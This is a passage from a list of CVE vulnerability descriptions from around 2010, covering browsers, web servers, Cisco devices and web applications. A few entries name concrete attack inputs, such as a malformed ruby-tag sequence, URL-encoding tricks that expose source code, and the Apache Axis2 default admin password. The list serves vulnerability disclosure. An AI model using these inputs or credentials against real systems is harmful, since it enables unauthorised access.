as used in Google Chrome before 4.0.249.78, does not properly handle a failure of memory allocation, which allows remote attackers to execute arbitrary code in the Chrome sandbox via a malformed GIF file that specifies a large size. [CVE-2010-0656] WebKit before r51295, as used in Google Chrome before 4.0.249.78, presents a directory-listing page in response to an XMLHttpRequest for a file:/// URL that corresponds to a directory, which allows attackers to obtain sensitive information or possibly have unspecified other impact via a crafted local HTML document. [CVE-2010-0655] Use-after-free vulnerability in Google Chrome before 4.0.249.78 allows user-assisted remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors involving the display of a blocked popup window during navigation to a different web site. [CVE-2010-0651] WebKit before r52784, as used in Google Chrome before 4.0.249.78 and Apple Safari before 4.0.5, permits cross-origin loading of CSS stylesheets even when the stylesheet download has an incorrect MIME type and the stylesheet document is malformed, which allows remote attackers to obtain sensitive information via a crafted document. [CVE-2010-0650] WebKit, as used in Google Chrome before 4.0.249.78 and Apple Safari, allows remote attackers to bypass intended restrictions on popup windows via crafted use of a mouse click event. [CVE-2010-0648] Mozilla Firefox, possibly before 3.6, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets[0].href property value, related to an IFRAME element. [CVE-2010-0647] WebKit before r53525, as used in Google Chrome before 4.0.249.89, allows remote attackers to execute arbitrary code in the Chrome sandbox via a malformed RUBY element, as demonstrated by a <ruby>><table><rt> sequence. [CVE-2010-0643] Google Chrome before 4.0.249.89 attempts to make direct connections to web sites when all configured proxy servers are unavailable, which allows remote HTTP servers to obtain potentially sensitive information about the identity of a client user via standard HTTP logging, as demonstrated by a proxy server that was configured for the purpose of anonymity. [CVE-2010-0642] Cisco Collaboration Server (CCS) 5 allows remote attackers to read the source code of JHTML files via URL encoded characters in the filename extension, as demonstrated by (1) changing .jhtml to %2Ejhtml, (2) changing .jhtml to .jhtm%6C, (3) appending %00 after .jhtml, and (4) appending %c0%80 after .jhtml, related to the (a) doc/docindex.jhtml, (b) browserId/wizardForm.jhtml, (c) webline/html/forms/callback.jhtml, (d) webline/html/forms/callbackICM.jhtml, (e) webline/html/agent/AgentFrame.jhtml, (f) webline/html/agent/default/badlogin.jhtml, (g) callme/callForm.jhtml, (h) webline/html/multichatui/nowDefunctWindow.jhtml, (i) browserId/wizard.jhtml, (j) admin/CiscoAdmin.jhtml, (k) msccallme/mscCallForm.jhtml, and (l) webline/html/admin/wcs/LoginPage.jhtml components. [CVE-2010-0641] Cross-site scripting (XSS) vulnerability in webline/html/admin/wcs/LoginPage.jhtml in Cisco Collaboration Server (CCS) 5 allows remote attackers to inject arbitrary web script or HTML via the dest parameter. [CVE-2010-0640] Cross-site scripting (XSS) vulnerability in CA eHealth Performance Manager 6.0.x through 6.2.x, when malicious HTML detection is disabled, allows remote attackers to inject arbitrary web script or HTML via a crafted request. [CVE-2010-0638] Cross-site request forgery (CSRF) vulnerability in WebCalendar 1.2.0 allows remote attackers to hijack the authentication of administrators for requests that change the administrative password via unknown vectors. NOTE: the provenance of this information is unknown [CVE-2010-0637] Multiple cross-site request forgery (CSRF) vulnerabilities in WebCalendar 1.2.0, and other versions before 1.2.5, allow remote attackers to hijack the authentication of administrators for requests that (1) delete an event or (2) ban an IP address from posting via unknown vectors. NOTE: some of these details are obtained from third party information. [CVE-2010-0636] Multiple cross-site scripting (XSS) vulnerabilities in WebCalendar 1.2.0, and other versions before 1.2.5, allow remote attackers to inject arbitrary web script or HTML via the (1) tab parameter to users.php and the PATH_INFO to (2) day.php, (3) month.php, and (4) week.php. NOTE: some of these details are obtained from third party information. [CVE-2010-0617] Cross-site scripting (XSS) vulnerability in ajax.php in evalSMSI 2.1.03 allows remote attackers to inject arbitrary web script or HTML via the return parameter. NOTE: the provenance of this information is unknown [CVE-2010-0615] Cross-site scripting (XSS) vulnerability in assess.php in evalSMSI 2.1.03 allows remote attackers to inject arbitrary web script or HTML via the reports comment box in a continue_assess action. NOTE: some of these details are obtained from third party information. [CVE-2010-0607] Cross-site scripting (XSS) vulnerability in Forms/status_statistics_1 in the Sterlite SAM300 AX Router allows remote attackers to inject arbitrary web script or HTML via the Stat_Radio parameter. [CVE-2010-0606] Cross-site scripting (XSS) vulnerability in scp/ajax.php in osTicket before 1.6.0 Stable allows remote authenticated users to inject arbitrary web script or HTML via the f parameter, possibly related to an error message generated by scp/admin.php. [CVE-2010-0594] Cross-site scripting (XSS) vulnerability in Cisco Router and Security Device Manager (SDM) allows remote attackers to inject arbitrary web script or HTML via unknown vectors, aka Bug ID CSCtb38467. [CVE-2010-0589] The Web Install ActiveX control (CSDWebInstaller) in Cisco Secure Desktop (CSD) before 3.5.841 does not properly verify the signatures of downloaded programs, which allows remote attackers to force the download and execution of arbitrary files via a crafted web page, aka Bug ID CSCta25876. [CVE-2010-0582] Cisco IOS 12.1 through 12.4, and 15.0M before 15.0(1)M1, allows remote attackers to cause a denial of service (interface queue wedge) via malformed H.323 packets, aka Bug ID CSCta19962. [CVE-2010-0571] Unspecified vulnerability in Cisco Digital Media Manager (DMM) 5.0.x and 5.1.x allows remote authenticated users to gain privileges via unknown vectors, and consequently execute arbitrary code via a crafted web application, aka Bug ID CSCtc46008. [CVE-2010-0570] Cisco Digital Media Manager (DMM) 5.0.x and 5.1.x has a default password for the Tomcat administration account, which makes it easier for remote attackers to execute arbitrary code via a crafted web application, aka Bug ID CSCta03378. [CVE-2010-0565] Unspecified vulnerability in Cisco ASA 5500 Series Adaptive Security Appliance 7.2 before 7.2(4.45), 8.0 before 8.0(4.44), 8.1 before 8.1(2.35), and 8.2 before 8.2(1.10), allows remote attackers to cause a denial of service (page fault and device reload) via a malformed DTLS message, aka Bug ID CSCtb64913 and "WebVPN DTLS Denial of Service Vulnerability." [CVE-2010-0563] The Single Sign-on (SSO) functionality in IBM WebSphere Application Server (WAS) 7.0.0.0 through 7.0.0.8 does not recognize the Requires SSL configuration option, which might allow remote attackers to obtain sensitive information by sniffing network sessions that were expected to be encrypted. [CVE-2010-0556] browser/login/login_prompt.cc in Google Chrome before 4.0.249.89 populates an authentication dialog with credentials that were stored by Password Manager for a different web site, which allows user-assisted remote HTTP servers to obtain sensitive information via a URL that requires authentication, as demonstrated by a URL in the SRC attribute of an IMG element. [CVE-2010-0554] The HTTP Authentication implementation in Geo++ GNCASTER 1.4.0.7 and earlier uses the same nonce for all authentication, which allows remote attackers to hijack web sessions or bypass authentication via a replay attack. [CVE-2010-0548] Multiple unspecified vulnerabilities in the Network Controller and Web Server in Xerox WorkCentre 5632, 5638, 5645, 5655, 5665, 5675, and 5687 allow remote attackers to (1) access mailboxes via unknown vectors that bypass Scan to Mailbox authorization or (2) read device configuration information via via unknown vectors that bypass web server authorization. [CVE-2010-0544] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to a malformed URL. [CVE-2010-0541] Cross-site scripting (XSS) vulnerability in the WEBrick HTTP server in Ruby in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote attackers to inject arbitrary web script or HTML via a crafted URI that triggers a UTF-7 error page. [CVE-2010-0534] Wiki Server in Apple Mac OS X 10.6 before 10.6.3 does not enforce the service access control list (SACL) for weblogs during weblog creation, which allows remote authenticated users to publish content via HTTP requests. [CVE-2010-0488] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0475] Cross-site scripting (XSS) vulnerability in esp/editUser.esp in the Palo Alto Networks firewall 3.0.x before 3.0.9 and 3.1.x before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the role parameter. [CVE-2010-0471] SQL injection vulnerability in the comment submission interface (includes/comment.php) in Enano CMS before 1.0.6pl1 allows remote attackers to execute arbitrary SQL commands via unspecified parameters. [CVE-2010-0470] Cross-site scripting (XSS) vulnerability in scvrtsrv.cmd in Comtrend CT-507IT ADSL Router allows remote attackers to inject arbitrary web script or HTML via the srvName parameter. [CVE-2010-0468] Cross-site scripting (XSS) vulnerability in utilities/longproc.cfm in PaperThin CommonSpot Content Server allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2010-0465] Cross-site scripting (XSS) vulnerability in the online Documents functionality in SugarCRM 5.2.x before 5.2.0l and 5.5.x before 5.5.0a allows remote authenticated users to inject arbitrary web script or HTML via the Document Name field. [CVE-2010-0464] Roundcube 0.3.1 and earlier does not request that the web browser avoid DNS prefetching of domain names contained in e-mail messages, which makes it easier for remote attackers to determine the network location of the webmail user by logging DNS requests. [CVE-2010-0463] Horde IMP 4.3.6 and earlier does not request that the web browser avoid DNS prefetching of domain names contained in e-mail messages, which makes it easier for remote attackers to determine the network location of the webmail user by logging DNS requests. [CVE-2010-0460] Multiple cross-site scripting (XSS) vulnerabilities in staff/index.php in Kayako SupportSuite 3.60.04 and earlier allow remote authenticated users to inject arbitrary web script or HTML via the (1) subject parameter and (2) contents parameter (aka body) in an insertquestion action. NOTE: some of these details are obtained from third party information. [CVE-2010-0455] Cross-site scripting (XSS) vulnerability in forum/viewtopic.php in PunBB 1.3 allows remote attackers to inject arbitrary web script or HTML via the pid parameter. [CVE-2010-0452] Multiple cross-site scripting (XSS) vulnerabilities in HP Project and Portfolio Management Center (PPMC, formerly Mercury IT Governance) 7.1 through SP10 and 7.5 through SP3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0449] Cross-site scripting (XSS) vulnerability in HP SOA Registry Foundation 6.63 and 6.64 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2010-0447] The helpmanager servlet in the web server in HP OpenView Performance Insight (OVPI) 5.4 and earlier does not properly authenticate and validate requests, which allows remote attackers to execute arbitrary commands via vectors involving upload of a JSP document. [CVE-2010-0446] Unspecified vulnerability on the HP DreamScreen 100 and 130 with firmware before 1.6.0.0, when using a web-connected configuration, allows remote attackers to obtain sensitive information via unknown vectors. [CVE-2010-0437] The ip6_dst_lookup_tail function in net/ipv6/ip6_output.c in the Linux kernel before 2.6.27 does not properly handle certain circumstances involving an IPv6 TUN network interface and a large number of neighbors, which allows attackers to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact via unknown vectors. [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus. [CVE-2010-0389] The admin server in Sun Java System Web Server 7.0 Update 6 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an HTTP request that lacks a method token. [CVE-2010-0388] Format string vulnerability in the WebDAV implementation in webservd in Sun Java System Web Server 7.0 Update 6 allows remote attackers to cause a denial of service (daemon crash) and possibly have unspecified other impact via format string specifiers in the encoding attribute of the XML declaration in a PROPFIND request. [CVE-2010-0387] Multiple heap-based buffer overflows in (1) webservd and (2) the admin server in Sun Java System Web Server 7.0 Update 7 allow remote attackers to cause a denial of service (daemon crash) and possibly have unspecified other impact via a long string in an "Authorization: Digest" HTTP header. [CVE-2010-0376] Cross-site scripting (XSS) vulnerability in product_list.php in JCE-Tech PHP Calendars, downloaded 2010-01-11, allows remote attackers to inject arbitrary web script or HTML via the cat parameter. NOTE: this issue is reportedly resultant from a forced SQL error message that occurs from exploitation of CVE-2010-0375. [CVE-2010-0374] Cross-site scripting (XSS) vulnerability in the Marketplace (com_marketplace) component 1.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the catid parameter in a show_category action to index.php. [CVE-2010-0371] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Hitmaaan Gallery 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) gall and (2) levela parameters. [CVE-2010-0370] Cross-site scripting (XSS) vulnerability in the Node Blocks module 5.x-1.1 and earlier, and 6.x-1.3 and earlier, a module for Drupal, allows remote authenticated users, with permissions to create or edit content and administer blocks, to inject arbitrary web script or HTML via the edit-title parameter (aka block title). [CVE-2010-0365] Cross-site scripting (XSS) vulnerability in search.php in BitScripts Bits Video Script 2.04 and 2.05 Gold Beta allows remote attackers to inject arbitrary web script or HTML via the order parameter. [CVE-2010-0363] Cross-site scripting (XSS) vulnerability in Zeus Web Server before 4.3r5, when SSL is enabled for the admin server, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2002-1785. [CVE-2010-0362] Zeus Web Server before 4.3r5 does not use random transaction IDs for DNS requests, which makes it easier for remote attackers to spoof DNS responses. [CVE-2010-0361] Stack-based buffer overflow in the WebDAV implementation in webservd in Sun Java System Web Server (aka SJWS) 7.0 Update 7 allows remote attackers to cause a denial of service (daemon crash) and possibly have unspecified other impact via a long URI in an HTTP OPTIONS request. [CVE-2010-0360] Sun Java System Web Server (aka SJWS) 7.0 Update 7 allows remote attackers to overwrite memory locations in the heap, and discover the contents of memory locations, via a malformed HTTP TRACE request that includes a long URI and many empty headers, related to an "overflow." NOTE: this might overlap CVE-2010-0272 and CVE-2010-0273. [CVE-2010-0359] Buffer overflow in the SSLv2 support in Zeus Web Server before 4.3r5 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long string in an invalid Client Hello message. [CVE-2010-0357] Cross-site scripting (XSS) vulnerability in the Login page in IBM Lotus Web Content Management (WCM) 6.0.1.4, 6.0.1.5, and 6.0.1.6 before iFix 32 [CVE-2010-0349] Cross-site scripting (XSS) vulnerability in C3 Corp. WebCalenderC3 0.32 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: this issue could not be reproduced by the vendor, but a patch was provided anyway. The original researcher is reliable. [CVE-2010-0348] Directory traversal vulnerability in C3 Corp. WebCalenderC3 0.32 and earlier allows remote attackers to read arbitrary files via unknown vectors. [CVE-2010-0347] Cross-site scripting (XSS) vulnerability in the VD / Geomap (vd_geomap) extension 0.3.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0346] Cross-site scripting (XSS) vulnerability in the Tip many friends (mimi_tipfriends) extension 0.0.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0345] Cross-site scripting (XSS) vulnerability in the Majordomo extension 1.1.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0335] Cross-site scripting (XSS) vulnerability in the Vote rank for news (vote_for_tt_news) extension 1.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0331] Cross-site scripting (XSS) vulnerability in the TV21 Talkshow (tv21_talkshow) extension 1.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0328] Cross-site scripting (XSS) vulnerability in the Unit Converter (cs2_unitconv) extension 1.0.4 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0327] Cross-site scripting (XSS) vulnerability in the KJ: Imagelightbox (kj_imagelightbox2) extension 2.0.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-2490. [CVE-2010-0326] Cross-site scripting (XSS) vulnerability in the Developer log (devlog) extension 2.9.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0321] Cross-site scripting (XSS) vulnerability in jobs/index.php in Jamit Job Board 3.0 allows remote attackers to inject arbitrary web script or HTML via the post_id parameter. [CVE-2010-0320] Cross-site scripting (XSS) vulnerability in submitlink.php in Glitter Central Script allows remote attackers to inject arbitrary web script or HTML via the catid parameter. [CVE-2010-0319] Cross-site scripting (XSS) vulnerability in index.php in Docmint 1.0 and 2.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-0315] WebKit before r53607, as used in Google Chrome before 4.0.249.89, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets[0].href property value, related to an IFRAME element. [CVE-2010-0314] Apple Safari allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets[0].href property value. [CVE-2010-0302] Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS before 1.4.4, when kqueue or epoll is used, allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3553. [CVE-2010-0276] IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 does not properly handle navigation of the "Try Lotus iNotes anyway" link from the page that reports use of an unsupported browser, which has unspecified impact and attack vectors, aka SPR LSHR7TBMQU. [CVE-2010-0275] Ultra-light Mode in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 does not properly handle script commands in the status-alerts URL, which has unspecified impact and attack vectors, aka SPR LSHR7TBM58. [CVE-2010-0274] Unspecified vulnerability in the Edit Contact scene in Ultra-light Mode in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 has unknown impact and attack vectors, aka SPR LSHR7TBLY5. [CVE-2010-0273] Unspecified vulnerability in Sun Java System Web Server 7.0 Update 6 on Linux allows remote attackers to execute arbitrary code by sending a process memory address and crafted data to TCP port 80, as demonstrated by the vd_sjws2 module in VulnDisco. NOTE: as of 20100106, this disclosure has no actionable information. However, because the VulnDisco author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2010-0272] Heap-based buffer overflow in Sun Java System Web Server 7.0 Update 6 on Linux allows remote attackers to discover process memory locations via crafted data to TCP port 80, as demonstrated by the vd_sjws2 module in VulnDisco. NOTE: as of 20100106, this disclosure has no actionable information. However, because the VulnDisco author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0230] SUSE Linux Enterprise 10 SP3 (SLE10-SP3) and openSUSE 11.2 configures postfix to listen on all network interfaces, which might allow remote attackers to bypass intended access restrictions. [CVE-2010-0220] The nsObserverList::FillObserverArray function in xpcom/ds/nsObserverList.cpp in Mozilla Firefox before 3.5.7 allows remote attackers to cause a denial of service (application crash) via a crafted web site that triggers memory consumption and an accompanying Low Memory alert dialog, and also triggers attempted removal of an observer from an empty observers array. [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. [CVE-2010-0190] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0189] A certain ActiveX control in NOS Microsystems getPlus Download Manager (aka DLM or Downloader) 1.5.2.35, as used in Adobe Download Manager, improperly validates requests involving web sites that are not in subdomains, which allows remote attackers to force the download and installation of arbitrary programs via a crafted name for a download site. [CVE-2010-0172] toolkit/components/passwordmgr/src/nsLoginManagerPrompter.js in the asynchronous Authorization Prompt implementation in Mozilla Firefox 3.6 before 3.6.2 does not properly handle concurrent authorization requests from multiple web sites, which might allow remote web servers to spoof an authorization dialog and capture credentials by demanding HTTP authentication in opportunistic circumstances. [CVE-2010-0162] Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, and SeaMonkey before 2.0.3, does not properly support the application/octet-stream content type as a protection mechanism against execution of web script in certain circumstances involving SVG and the EMBED element, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via an embedded SVG document. [CVE-2010-0160] The Web Worker functionality in Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, and SeaMonkey before 2.0.3, does not properly handle array data types for posted messages, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors. [CVE-2010-0155] CRLF injection vulnerability in load.php in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5 allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the javaVersion parameter. [CVE-2010-0154] Directory traversal vulnerability in sla/index.php in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the l parameter, related to an "Insecure Direct Object Reference vulnerability." [CVE-2010-0153] Multiple cross-site request forgery (CSRF) vulnerabilities in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5.0.2 allow remote attackers to hijack the authentication of administrators for requests that (1) change settings or (2) conduct denial of service attacks. [CVE-2010-0144] Unspecified vulnerability in the WebSafe DistributorServlet in the embedded HTTPS server on the Cisco IronPort Encryption Appliance 6.2.x before 6.2.9.1 and 6.5.x before 6.5.2, and the IronPort PostX MAP before 6.2.9.1, allows remote attackers to read arbitrary files via unknown vectors, aka IronPort Bug 65922. [CVE-2010-0143] Unspecified vulnerability in the administrative interface in the embedded HTTPS server on the Cisco IronPort Encryption Appliance 6.2.x before 6.2.9.1 and 6.5.x before 6.5.2, and the IronPort PostX MAP before 6.2.9.1, allows remote attackers to read arbitrary files via unknown vectors, aka IronPort Bug 65921. [CVE-2010-0132] Cross-site scripting (XSS) vulnerability in ViewVC 1.1 before 1.1.5 and 1.0 before 1.0.11, when the regular expression search functionality is enabled, allows remote attackers to inject arbitrary web script or HTML via vectors related to "search_re input," a different vulnerability than CVE-2010-0736. [CVE-2010-0123] The database backup implementation in Employee Timeclock Software 0.99 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for a "semi-predictable file name." [CVE-2010-0115] SQL injection vulnerability in login.php in the GUI management console in Symantec Web Gateway 4.5 before 4.5.0.376 allows remote attackers to execute arbitrary SQL commands via the USERNAME parameter. [CVE-2010-0112] Multiple SQL injection vulnerabilities in the Administrative Interface in the IIS extension in Symantec IM Manager before 8.4.16 allow remote attackers to execute arbitrary SQL commands via (1) the rdReport parameter to rdpageimlogic.aspx, related to the sGetDefinition function in rdServer.dll, and SQL statements contained within a certain report file [CVE-2010-0090] Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18 allows remote attackers to affect integrity and availability via unknown vectors. [CVE-2010-0089] Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect availability via unknown vectors. [CVE-2010-0087] Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-0078] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2MP3, 10.0MP2, and 10.3.1 allows remote attackers to affect availability via unknown vectors. [CVE-2010-0074] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0SP7, 8.1SP6, 9.0, 9.1, 9.2MP3, 10.0MP2, and 10.3.1 allows remote attackers to affect availability via unknown vectors. [CVE-2010-0073] Unspecified vulnerability in the WebLogic Server in Oracle WebLogic Server 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, and 10.3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-0069] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0, SP7, 8.1SP6, 9.0, 9.1, 9.2MP3, 10.0MP1, and 10.3.0 allows remote attackers to affect integrity via unknown vectors. [CVE-2010-0068] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2MP2, and 10.0 allows remote attackers to affect confidentiality via unknown vectors. [CVE-2010-0063] Incomplete blacklist vulnerability in CoreTypes in Apple Mac OS X before 10.6.3 makes it easier for user-assisted remote attackers to execute arbitrary JavaScript via a web page that offers a download with a Content-Type value that is not on the list of possibly unsafe content types for Safari, as demonstrated by the values for the (1) .ibplugin and (2) .url extensions. [CVE-2010-0054] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving HTML IMG elements. [CVE-2010-0053] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the run-in Cascading Style Sheets (CSS) display property. [CVE-2010-0052] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to "callbacks for HTML elements." [CVE-2010-0051] WebKit in Apple Safari before 4.0.5 does not properly validate the cross-origin loading of stylesheets, which allows remote attackers to obtain sensitive information via a crafted HTML document. NOTE: this might overlap CVE-2010-0651. [CVE-2010-0050] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags. [CVE-2010-0049] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via HTML elements with right-to-left (RTL) text directionality. [CVE-2010-0048] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted XML document. [CVE-2010-0047] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to "HTML object element fallback content." [CVE-2010-0046] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted format arguments. [CVE-2010-0044] PubSub in Apple Safari before 4.0.5 does not properly implement use of the Accept Cookies preference to block cookies, which makes it easier for remote web servers to track users by setting a cookie in a (1) RSS or (2) Atom feed. [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0005] query.py in the query interface in ViewVC before 1.1.3 does not reject configurations that specify an unsupported authorizer for a root, which might allow remote attackers to bypass intended access restrictions via a query. [CVE-2009-5132] The Filtering Service in Websense Web Security and Web Filter before 6.3.1 Hotfix 106 and 7.x before 7.1 allow remote attackers to cause a denial of service (filtering outage) via a crafted URL. [CVE-2009-5131] The Receive Service in Websense Email Security before 7.1 does not recognize domain extensions in the blacklist, which allows remote attackers to bypass intended access restrictions and send e-mail messages via an SMTP session. [CVE-2009-5130] The Rules Service in Websense Email Security before 7.1 allows remote attackers to cause a denial of service (service crash) via an attachment with a crafted size. [CVE-2009-5129] The Websense V10000 appliance before 1.0.1 allows remote attackers to cause a denial of service (intermittent LDAP authentication outage) via a login attempt with an incorrect password. [CVE-2009-5128] The Websense V10000 appliance before 1.0.1 allows remote attackers to cause a denial of service (memory consumption and process crash) via a large file that is not properly handled during buffering. [CVE-2009-5122] The Personal Email Manager component in Websense Email Security before 7.2 allows remote attackers to obtain potentially sensitive information from the JBoss status page via an unspecified query. [CVE-2009-5121] Websense Email Security 7.1 before Hotfix 4 allows remote attackers to bypass the sender-based blacklist by using the 8BITMIME EHLO keyword in the SMTP session. [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port. [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data. [CVE-2009-5117] The Web Post Protection feature in McAfee Host 